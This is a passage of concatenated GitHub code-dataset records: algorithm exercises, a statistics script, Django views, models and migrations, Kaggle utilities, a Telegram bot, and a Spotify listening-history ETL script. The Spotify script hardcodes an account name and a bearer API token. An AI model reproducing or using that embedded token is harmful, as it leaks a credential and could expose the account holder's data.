right\n\n\ndef _tree_diameter(v, heights):\n if v is None:\n return 0\n left = _tree_diameter(v.left, heights)\n right = _tree_diameter(v.right, heights)\n heights[v] = left + right\n return 1 + max(left, right) # return one more edge\n\n\ndef tree_diameter(v):\n heights = {}\n _tree_diameter(v, heights)\n print(list(heights.values()))\n return max(heights.values())\n\n\n# Longest path is from i to m with b as common ancestor,\n# 8 edges\nt1 = Vertex('a',\n Vertex('b',\n Vertex('d',\n Vertex('f'),\n Vertex('g',\n Vertex('h',\n None,\n Vertex('i')))),\n Vertex('e',\n None,\n Vertex('j',\n Vertex('k'),\n Vertex('l',\n Vertex('m'))))),\n Vertex('c'))\n\n\nprint(tree_diameter(t1))\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/05_19_tree_diameter.py","file_name":"05_19_tree_diameter.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71913818089","text":"\"\"\"\r\nRegistration : 012-1111-0461-20\r\nRoll : 203012-21-0008 \r\nDescription : POISSON DISTRIBUTION\r\nAuthor : Chitrak Roychowdhury\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import moment\r\nfrom scipy.special import factorial\r\n\r\n#POISSON DISTRIBUTION\r\n\r\nlamda = 5.0 ;\r\nN = 100000 \r\nP = np.random.poisson(lamda,N);\r\n\r\n#plotting histogram:\r\nn1,bins,patches = plt.hist(P,bins=18,density=True,color='lightgreen',ec='r',label='Poisson Distribution of 100000 \\nrandom numbers')\r\n\r\n#Plotting Poisson distribution for visualisation\r\nplt.plot(bins,(lamda**bins * np.exp(-lamda))/ factorial(bins), linewidth=2, color='k', label='Poisson distribution (Theoretical)')\r\nplt.title('Poisson Distribution')\r\nplt.xlabel('x $ \\longrightarrow $')\r\nplt.ylabel('$P_{poisson}(x)$ $ 
\\longrightarrow $')\r\nplt.legend()\r\nplt.xlim(-1,18)\r\nplt.grid(True)\r\nplt.show()\r\n\r\n# MOMENTS\r\nK = int(input(\"Calculate moment upto: \"))\r\nfor i in range(1,K+1):\r\n print(\"\\n\\t\\tMoment no: \",i)\r\n moment_no = moment(P,moment = i)\r\n print(\"* mu\",i,\": \",moment_no)\r\n\r\n#Theoretical moment\r\n ThMoment=0\r\n moment_=0\r\n for j in range(1,N):\r\n moment_ = ((P[j]-np.mean(P))**i)/N\r\n ThMoment+=moment_\r\n print(\"* Theoritical value: \",ThMoment)\r\n print( \"* Error =\" , moment_no-ThMoment)\r\n\r\n# CUMULANTS\r\nc1 = moment(P,1)\r\nprint(\"\\n1 st cumulant \",c1)\r\nc2 = np.mean(moment(P,2))-(np.mean(moment(P,1)))**2\r\nprint(\"2 nd cumulant \",c2)\r\nc3 = np.mean(moment(P,3))-(3*(np.mean(moment(P,2))*(np.mean(moment(P,1)))))+(2*np.mean(moment(P,1)**3))\r\nprint(\"3 rd cumulant \",c3)\r\nc4 = np.mean(moment(P,4))-(4*(c3)*(c1))-(3*c2**2)+(12*c2*c1**2)-(6*c1**4)\r\nprint(\"4 th Cumulant \",c4)\r\n","repo_name":"chitrak24/Statistical-Mechanics","sub_path":"Poisson Distribution.py","file_name":"Poisson Distribution.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26820075998","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\ncluster_result = np.zeros(10000)\n\n# 从pickle文件读取降维结果\nwith open(\"./result/part-00000\",\"rb\") as result:\n for i in range(10000):\n line = result.readline()\n cluster_result[i] = int(line)\n\nwith open(\"usdata.pickle\", \"rb\") as usdata:\n data = pickle.load(usdata)\n y = cluster_result[:10000] # 这里,y表示聚类结果(一维向量,list或者numpy.array都可以)\n # y = np.zeros(5000)\n # y = np.append(y, np.ones(5000), 0)\n # y = np.random.randint(0, 5, 10000)\n plt.scatter(data[:, 0], data[:, 1], c=y)\n plt.show()\n","repo_name":"YunFeng0817/bigdata_analyse","sub_path":"lab2/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71536857447","text":"\"\"\"\nExtraction that it allows to get the information of my count of Spotify, show them\nwhat i have listed last 24 hours\n\nThe idea is to create the ETL.\n\"\"\"\n\n#import sqlalchemy\nimport pandas as pd \n#from sqlalchemy.orm import sessionmaker\nimport requests\nimport json\nfrom datetime import datetime\nimport datetime\nimport sqlite3\n\n\nDATABASE_LOCATION = \"\"\n\n# Data user SP\n\nUSER_ID = \"carolina.munozce\"\nTOKEN = \"BQBWr-KU7mV9ZBjdi3FXI2FjEL5_klcUVWUUyZnYtfOcuBL19LyEGJk_F1FUYF2bAF55QoJuNVbipCA05X8SBIsk4_faRkBbiXUHlUV0aL9hicTj5zkuqXZlH-Kxk6tPotm5Nw8XQT3lYkECIpNIZIcK2mZs\"\n\ndef check_if_valid_data(df: pd.DataFrame) -> bool:\n #Check if dataframe is empty. In this case, if we don't listen any music on SP\n if df.empty:\n print(\" No songs download. 
Finish execution\")\n return False\n\n # Primary key check -> For duplicate data\n if pd.Series(df['played_at']).is_unique:\n pass\n else:\n raise Exception(\"Primary key check is violed\")\n\n # Check any null\n #if df.isnull().values.any():\n # raise Exception(\"Null value found\")\n\n # Check that all timestamps are of yesterday's date\n yesterday = datetime.datetime.now() - datetime.timedelta(days=1)\n yesterday = yesterday.replace(hour=0, minute=0, second=0,microsecond=0)\n\n timestamps = df[\"timestamps\"].tolist()\n for timestamp in timestamps:\n if datetime.datetime.strptime(timestamp,\"%Y-%m-%d\") != yesterday:\n raise Exception(\"At least one of the returned songs does not come fron within the last 24 hours\")\n return True\n\nif __name__ == \"__main__\":\n \n headers = {\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer {token}\".format(token=TOKEN)\n }\n #Convert unix timestamp in milliseconds\n today =datetime.datetime.now()\n yesterday = today - datetime.timedelta(days=1)\n yesterday_unix_timestamp = int(yesterday.timestamp())* 1000\n\n # Get request from SP last 24 hours\n\n r = requests.get(\"https://api.spotify.com/v1/me/player/recently-played?after={time}\".format(time=yesterday_unix_timestamp), headers = headers)\n\n data = r.json()\n # print (data)\n\n song_names = []\n artist_names = []\n played_at_list = []\n timestamps = []\n\n for song in data[\"items\"]:\n song_names.append(song[\"track\"][\"name\"])\n artist_names.append(song[\"track\"][\"album\"][\"artists\"][0][\"name\"])\n played_at_list.append(song[\"played_at\"])\n timestamps.append(song[\"played_at\"][0:10])\n\n song_dict = {\n \"song_name\": song_names,\n \"artist_names\": artist_names,\n \"played_at\": played_at_list,\n \"timestamps\": timestamps\n }\n\n song_df = pd.DataFrame(song_dict, columns= [\"song_name\",\"artist_name\",\"played_at\",\"timestamps\"])\n \n #Validate the song\n if check_if_valid_data(song_df):\n print(\"Data valid, process to Load stage\")\n\n print (song_df)\n\n ","repo_name":"carolinamunozce/spotify_extraction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71681605288","text":"from interface.error import data_no_found\nfrom django.shortcuts import render,redirect,HttpResponse\nfrom user.models import User_Profile,User, Permission\nfrom user_crap.models import user_crap\nfrom .error import data_no_found\nfrom .utily import REQUEST\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.views.decorators.clickjacking import xframe_options_sameorigin\nfrom .models import HOME_PAGE_IMAGE,HOME_PAGE_ARTICALSE\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\n\n\n\n\n# Create your views here\n\n\n\n#1\ndef home(request):\n # return HttpResponse(\"hello world\")\n req = REQUEST(request)\n imgs = list(HOME_PAGE_IMAGE.objects.all())\n articles = list(HOME_PAGE_ARTICALSE.objects.all())\n img = None\n try:\n img = imgs[0]\n imgs = imgs[1:]\n except:\n imgs = None\n img = None\n return render(request,\"home.html\",{\"pg_no\":1,\"imgs\":imgs,\"img\":img,\"toggle\":0,\"articles\":articles})\n\n\n\"\"\"____________\"\"\"\n#2 comes under appstore\ndef upload(request):\n req = REQUEST(request)\n objs = list()\n for oj in user_crap.objects.all():\n objs.append(oj.title)\n objs = 
set(objs)\n if req.LOGIN_LOGOUT().is_login():\n # if request.method == \"POST\":\n # user = request.POST.get(\"user\")\n # title = request.POST.get(\"title\")\n # file = request.FILES.get(\"file\")\n # decs = request.POST.get(\"decs\")\n # data_type = request.POST.get(\"data_type\")\n # if user != None and title != None and file != None and decs != None and data_type != None:\n # try:\n # print(type(file))\n # user_crap.objects.create(user=user,title=title,data=file,decs=decs,type_data=data_type)\n # return req.SUCCESS().success(f\"your data is uploaded file name:-{file} and title:-{title}\",req=None,upload=True,appstore=True)\n # except Exception as e:\n # print(e)\n # return req.ERROR().error(\"Some thimg went wrong\")\n # pass\n # else:\n # return req.ERROR().error(\"Some feilds are missing\")\n # # print(user,title,file,decs)\n if request.is_ajax():\n user = request.POST.get(\"user\")\n title = request.POST.get(\"title\")\n file = request.FILES.get(\"file\")\n decs = request.POST.get(\"decs\")\n data_type = request.POST.get(\"data_type\")\n if user != None and title != None and file != None and decs != None and data_type != None:\n try:\n # print(type(file))\n user_crap.objects.create(user=user,title=title,data=file,decs=decs,type_data=data_type)\n return req.SUCCESS().success(f\"your data is uploaded file name:-{file} and title:-{title}\",req=None,upload=True,appstore=True)\n except Exception as e:\n print(e)\n return req.ERROR().error(\"Some thimg went wrong\")\n pass\n else:\n return req.ERROR().error(\"Some feilds are missing\")\n # print(user,title,file,decs)\n else:\n return req.ERROR().error(\"you have to login first\")\n return render(request,\"upload.html\",{\"pg_no\":2,\"user\":str(request.user),\"objs\":objs})\n#2\ndef appstore(request):\n req = REQUEST(request)\n flag = 0\n data_type = [\"app\",\"music\",\"pdf\",\"doc\",\"video\",\"compress_file\",\"image\"]\n objs = list(user_crap.objects.all())[-100:]\n items = list()\n for oj in user_crap.objects.all():\n items.append(oj.title)\n items = set(items)\n items = list(items)\n items.extend(data_type)\n \n if request.method == \"POST\":\n item = request.POST.get(\"search\")\n copy = item\n if copy.lower() in data_type:\n temp = user_crap.objects.filter(type_data__contains=item)\n else:\n temp = user_crap.objects.filter(title__contains=item)\n objs = list(temp)\n try:\n objs[0]\n print(\" \")\n except:\n flag += 1\n \n if flag != 0:\n return req.ERROR().error(\"No data found\")\n\n return render(request,\"appstore.html\",{\"pg_no\":2,\"objs\":objs,\"items\":items})\n\n#2\n@xframe_options_sameorigin\ndef show_data(request):\n req = REQUEST(request)\n if request.method == \"POST\":\n ID = request.POST.get(\"id\")\n \n if ID != None:\n data = user_crap.objects.get(id = ID)\n \n return render(request,\"ysdfgjdgsj.html\",{\"pg_no\":2,\"data\":data})\n else:\n return req.ERROR().error(\"This page is not ment to use in this way\")\n\"\"\"____________\"\"\"\n\n#3\ndef signup(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().is_login():\n return req.ERROR().error(\"You are already login in for sign up you have to logout\")\n\n if request.method == \"POST\":\n # username = request.POST.get(\"username\")\n # password = request.POST.get(\"password\")\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('login')\n else:\n form = UserCreationForm()\n return render(request,\"signup.html\",{\"pg_no\":3,\"form\":form})\n# 2\n# audio\n# @csrf_exempt\n# def audio(request):\n# if request.method == 
\"POST\":\n# obj_id = request.POST.get('obj_id')\n# return HttpResponse(\"audio\")\n\n#4\ndef login(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().is_login():\n return redirect(\"home\")\n\n\n if request.method == \"POST\":\n username = request.POST.get(\"username\")\n password = request.POST.get(\"password\")\n if len(username) == 0 or len(password) == 0:\n # print(\"hello\")\n return req.ERROR().error(\"username or password is empty\")\n else:\n if(req.LOGIN_LOGOUT().user_login(username,password)):\n user = req.LOGIN_LOGOUT().ret_user()\n return req.SUCCESS().success(\"you are login\",user.is_superuser)\n else:\n return req.ERROR().error(\"Login not successful\")\n \n return render(request,\"login.html\",{\"pg_no\":4})\n\n\n\ndef logout(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().user_logout():\n return req.SUCCESS().success(\"you are logout\")\n else:\n return req.ERROR().error(\"Your are not login\")\n\n","repo_name":"anshjoseph/home-nas","sub_path":"HOME_NAS/interface/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38518399104","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 17 23:07:54 2017\r\n\r\n@author: vrtjso\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nimport random\r\nfrom operator import le, eq\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn import model_selection, preprocessing\r\n\r\ndef RMSLE(y, yfit):\r\n n = len(y)\r\n s = 0\r\n for i in range(0,n):\r\n s += (np.log(yfit[i] + 1) - np.log(y[i] + 1)) ** 2\r\n RMSLE = np.sqrt(s/n)\r\n return RMSLE\r\n\r\n\r\n#Objective function used for xgb\r\ndef objective(yfit, dtrain):\r\n y = dtrain.get_label()\r\n g = 2 * (np.log(yfit + 1) - np.log(y + 1)) / (yfit + 1)\r\n h = (2 - 2 * np.log(yfit + 1) + 2 * np.log(y + 1)) / ((yfit + 1) ** 2)\r\n #n = dtrain.num_row()\r\n #g = []\r\n #h = []\r\n #for i in range(0,n):\r\n # g.append(2 * (np.log(yfit[i] + 1) - np.log(y[i] + 1)) / (yfit[i] + 1))\r\n # h.append((2 - 2 * np.log(yfit[i] + 1) + 2 * np.log(y[i] + 1)) / ((yfit[i] + 1) ** 2))\r\n return g, h\r\n\r\n#Metric used for xgb cv\r\ndef eval_metric(yfit, dtrain):\r\n y = dtrain.get_label()\r\n return 'error', RMSLE(y,yfit)\r\n\r\ndef CreateOutput(prediction):\r\n output = pd.read_csv('test.csv')\r\n output = output[['id']]\r\n output['price_doc'] = prediction\r\n output.to_csv('Submission.csv',index=False)\r\n \r\n \r\n#load data\r\ndef loadTraindata(takeLog=True):\r\n #filename = 'train.csv'\r\n filename = 'train_featured.csv'\r\n rawDf = pd.read_csv(filename)\r\n Ytrain = rawDf['price_doc'].values\r\n Xtrain = rawDf.drop(['price_doc','w'], 1).values\r\n return Ytrain, Xtrain\r\n\r\ndef loadTestdata():\r\n #filename = 'test.csv'\r\n filename = 'test_featured.csv'\r\n rawDf = pd.read_csv(filename)\r\n Xtest = rawDf.values\r\n return Xtest\r\n\r\n#load random small part of data for fast model testing\r\ndef loadSample(n=300):\r\n #filename = 'train.csv'\r\n #filename = 'train_cleaned.csv'\r\n filename = 'train_featured.csv'\r\n size = pd.read_csv(filename).shape[0]\r\n skip = sorted(random.sample(range(1,size+1),size-n))\r\n rawDf = pd.read_csv(filename, skiprows = skip)\r\n\r\n Ytrain = rawDf['log_price'].values\r\n Xtrain = rawDf.drop(['log_price'], 1).values\r\n return Ytrain, Xtrain\r\n\r\n#Used to undersample strange values\r\ndef sample_vals(df, price_value, ratio, condition):\r\n indices = condition(df.price_doc, price_value) & 
(df.product_type == 0)\r\n df_resampled = df.loc[indices].sample(frac=ratio)\r\n df_remaining = df.loc[~indices]\r\n df_new = pd.concat([df_resampled, df_remaining], axis=0)\r\n return df_new\r\n\r\n#Encoding dummy variables\r\ndef Encoding(TestEncoding = True):\r\n filename = 'test.csv' if TestEncoding else 'train.csv'\r\n rawDf = pd.read_csv(filename)\r\n \r\n #Drop variable with no use and small variance, and sub area\r\n rawDf = rawDf.drop([\"id\",\"ID_metro\",\"ID_railroad_station_walk\",\"ID_railroad_station_avto\",\r\n \"ID_big_road1\", \"ID_big_road2\", \"ID_railroad_terminal\", \"ID_bus_terminal\"],1)\r\n rawDf = rawDf.drop([\"culture_objects_top_25_raion\",\"oil_chemistry_raion\",\"railroad_terminal_raion\",\r\n \"nuclear_reactor_raion\", \"build_count_foam\", \"big_road1_1line\",\"railroad_1line\",\r\n \"office_sqm_500\", \"trc_sqm_500\", \"cafe_count_500_price_4000\", \"cafe_count_500_price_high\",\r\n \"mosque_count_500\", \"leisure_count_500\", \"office_sqm_1000\", \"trc_sqm_1000\",\r\n \"cafe_count_1000_price_high\", \"mosque_count_1000\", \"cafe_count_1500_price_high\",\r\n \"mosque_count_1500\", \"cafe_count_2000_price_high\"],1)\r\n #rawDf = rawDf.drop('sub_area',1)\r\n \r\n result = rawDf\r\n for i in range(1,rawDf.shape[1]): #Do not encode timestamp\r\n if rawDf.ix[:,i].dtype == np.object:\r\n varName = rawDf.columns[i]\r\n if varName == 'sub_area':\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName)\r\n else:\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName, drop_first=True)\r\n result = pd.concat([result, dummy_ranks], axis=1)\r\n result = result.drop(varName, 1)\r\n varName = 'material' #special case\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName)\r\n result = pd.concat([result, dummy_ranks], axis=1)\r\n result = result.drop(varName, 1)\r\n outputFile = 'test_encoded.csv' if TestEncoding else 'train_encoded.csv'\r\n result.to_csv(outputFile,index=False)\r\n #return result\r\n\r\n#用PCA合并同一个系列高度相关的feature\r\ndef FeatureCombination(Df,s='',num_feature=2): \r\n feature_set = []\r\n for c in Df.columns:\r\n if c.startswith(s): feature_set.append(c)\r\n print('combining', len(feature_set), 'features')\r\n data = Df[feature_set].values\r\n\r\n for c in Df.columns:\r\n if Df[c].dtype == 'object':\r\n lbl = preprocessing.LabelEncoder()\r\n lbl.fit(list(Df[c].values))\r\n Df[c] = lbl.transform(list(Df[c].values))\r\n \r\n imp = preprocessing.Imputer()\r\n data = imp.fit_transform(data)\r\n data = preprocessing.scale(data)\r\n pca = PCA(num_feature)\r\n pca.fit(data)\r\n print('explained_variance_ratio_:', pca.explained_variance_ratio_)\r\n trans = pca.transform(data)\r\n for i in range(0,num_feature):\r\n Df[s+'_%d'%(i+1)] = trans[:,i]\r\n Df.drop(feature_set,1,inplace=True)\r\n return Df","repo_name":"LenzDu/Kaggle-Competition-Sberbank","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"53"} +{"seq_id":"20556965249","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n STR_DATE_CREATED = b'date created'\n STR_DATE_UPDATED = b'date updated'\n STR_QUIZ_QUESTION = 'quiz.Question'\n STR_QUIZ_QUIZ = 'quiz.Quiz'\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n 
migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('title', models.TextField()),\n ('type', models.CharField(default=b'multichoice',\n max_length=15,\n choices=[(b'multichoice',\n b'Multiple choice'),\n (b'shortanswer'\n b'Short answer'),\n (b'matching',\n b'Matching'),\n (b'numerical',\n b'Numerical'),\n (b'multiselect',\n b'Multiple select'),\n (b'description',\n b'Information only'),\n (b'essay',\n b'Essay question')])),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Question',\n 'verbose_name_plural': 'Questions',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuestionProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuestionProp',\n 'verbose_name_plural': 'QuestionProps',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='Quiz',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('draft', models.BooleanField(default=False)),\n ('deleted', models.BooleanField(default=False)),\n ('title', models.TextField()),\n ('description', models.TextField(blank=True)),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Quiz',\n 'verbose_name_plural': 'Quizzes',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizAttempt',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('attempt_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=b'date attempted')),\n ('submitted_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=b'date submitted')),\n ('score', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('maxscore', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('ip', models.IPAddressField()),\n ('instance_id', models.CharField(max_length=50,\n null=True,\n blank=True)),\n ('agent', models.TextField(blank=True)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizAttempt',\n 'verbose_name_plural': 'QuizAttempts',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizAttemptResponse',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('score', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('text', models.TextField(blank=True)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n 
on_delete=models.CASCADE)),\n ('quizattempt', models.ForeignKey(to='quiz.QuizAttempt',\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizAttemptResponse',\n 'verbose_name_plural': 'QuizAttemptResponses',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizProp',\n 'verbose_name_plural': 'QuizProps',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizQuestion',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('order', models.IntegerField(default=1)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizQuestion',\n 'verbose_name_plural': 'QuizQuestions',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='Response',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('score', models.DecimalField(default=0,\n max_digits=6,\n decimal_places=2)),\n ('title', models.TextField()),\n ('order', models.IntegerField(default=1)),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Response',\n 'verbose_name_plural': 'Responses',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='ResponseProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('response', models.ForeignKey(to='quiz.Response',\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'ResponseProp',\n 'verbose_name_plural': 'ResponseProps',\n },\n bases=(models.Model, ),\n ),\n migrations.AddField(\n model_name='quiz',\n name='questions',\n field=models.ManyToManyField(to=STR_QUIZ_QUESTION,\n through='quiz.QuizQuestion'),\n preserve_default=True,\n ),\n ]\n","repo_name":"DigitalCampus/django-oppia","sub_path":"quiz/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":11507,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"25122188394","text":"# Bu araç @keyiflerolsun tarafından | @KekikAkademi için yazılmıştır.\n\nfrom telethon import TelegramClient\nfrom telethon.sessions import StringSession\nfrom telethon.errors.rpcerrorlist import MediaEmptyError\n\nfrom contextlib import suppress\nfrom json import loads\nfrom aiofiles import open\nfrom os import environ, path\nfrom veri_ver import a101_brosurler\n\nclient = TelegramClient(\n session = StringSession(),\n api_id = int(environ.get(\"TG_API_ID\")),\n api_hash = environ.get(\"TG_API_HASH\")\n).start(bot_token = 
environ.get(\"TG_BOT_TOKEN\"))\n\nasync def aktuel_robot():\n if path.isfile(\"A101.json\"):\n async with open(\"A101.json\", \"r+\", encoding=\"utf-8\") as dosya:\n eski_veriler = loads(await dosya.read())\n else:\n eski_veriler = {}\n\n yeni_veriler = await a101_brosurler()\n\n for anahtar, resimler in yeni_veriler.items():\n if not resimler:\n continue\n\n eski_resimler = eski_veriler.get(anahtar, [])\n yeni_resimler = [resim for resim in resimler if resim not in eski_resimler]\n\n for resim in yeni_resimler:\n try:\n await client.send_file(int(environ.get(\"TG_MESAJ_ID\")), resim, caption=f\"**{anahtar}**\")\n except Exception as hata:\n print(f\"Resim : {resim}\")\n print(f\"Hata : {type(hata).__name__} - {hata}\")\n\nif __name__ == \"__main__\":\n with client:\n client.loop.run_until_complete(aktuel_robot())","repo_name":"keyiflerolsun/A101AktuelRobot","sub_path":"basla.py","file_name":"basla.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"tr","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"2490615892","text":"from django.contrib import admin\nfrom django.contrib.auth import forms\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.base_user import BaseUserManager\n# Register your models here.\n\nfrom .models import User, UserProfile, EmployeeIDInformation, EmployeeNextOfKin, EmployeeMaritalInformation, EmployeeDependants, EmployeeBankInformation\nfrom .forms import UserCreationForm, UserChangeForm, RegistrationForm\n\nemployeeModels = [EmployeeIDInformation, EmployeeNextOfKin, EmployeeMaritalInformation, EmployeeDependants, EmployeeBankInformation]\n\nclass EmployeeBankInformationInline(admin.StackedInline):\n model = EmployeeBankInformation\n can_delete = False\n verbose_plural_name =\"Employee Bank Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeDependantsInline(admin.StackedInline):\n model = EmployeeDependants\n can_delete = False\n verbose_plural_name =\"Employee Dependants Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeMaritalInformationInline(admin.StackedInline):\n model = EmployeeMaritalInformation\n can_delete = False\n verbose_plural_name =\"Employee Marital Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeNextOfKinInline(admin.StackedInline):\n model = EmployeeNextOfKin\n can_delete = False\n verbose_plural_name =\"Employee Next of Kin Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeIDInformationInline(admin.StackedInline):\n model = EmployeeIDInformation\n can_delete = False\n verbose_plural_name =\"Employee ID Information\"\n foreignkey_name = 'staffID'\n\nclass UserProfileInline(admin.StackedInline):\n model = UserProfile\n can_delete = False\n verbose_plural_name =\"User Profile\"\n foreignkey_name = 'user'\n\nclass CustomUserAdmin(UserAdmin):\n model = User\n form = UserChangeForm\n add_form = UserCreationForm\n\n list_display = ('email', 'first_name', 'last_name', 'username', 'phone_number', 'is_staff', 'is_superuser', 'date_of_birth')\n # inlines = (EmployeeIDInformationInline,)\n inlines = (UserProfileInline, EmployeeIDInformationInline, EmployeeNextOfKinInline, EmployeeMaritalInformationInline, \n EmployeeDependantsInline, EmployeeBankInformationInline,)\n list_filter = ['is_superuser']\n\n add_fieldsets = UserAdmin.add_fieldsets + (\n ('Personal Information',\n {'fields':(\n 'email',\n ('first_name', 'middle_name', 'last_name', 'date_of_birth', 'gender')\n , 'phone_number', 'city','country',)\n }),\n ('Company Information',{\n 
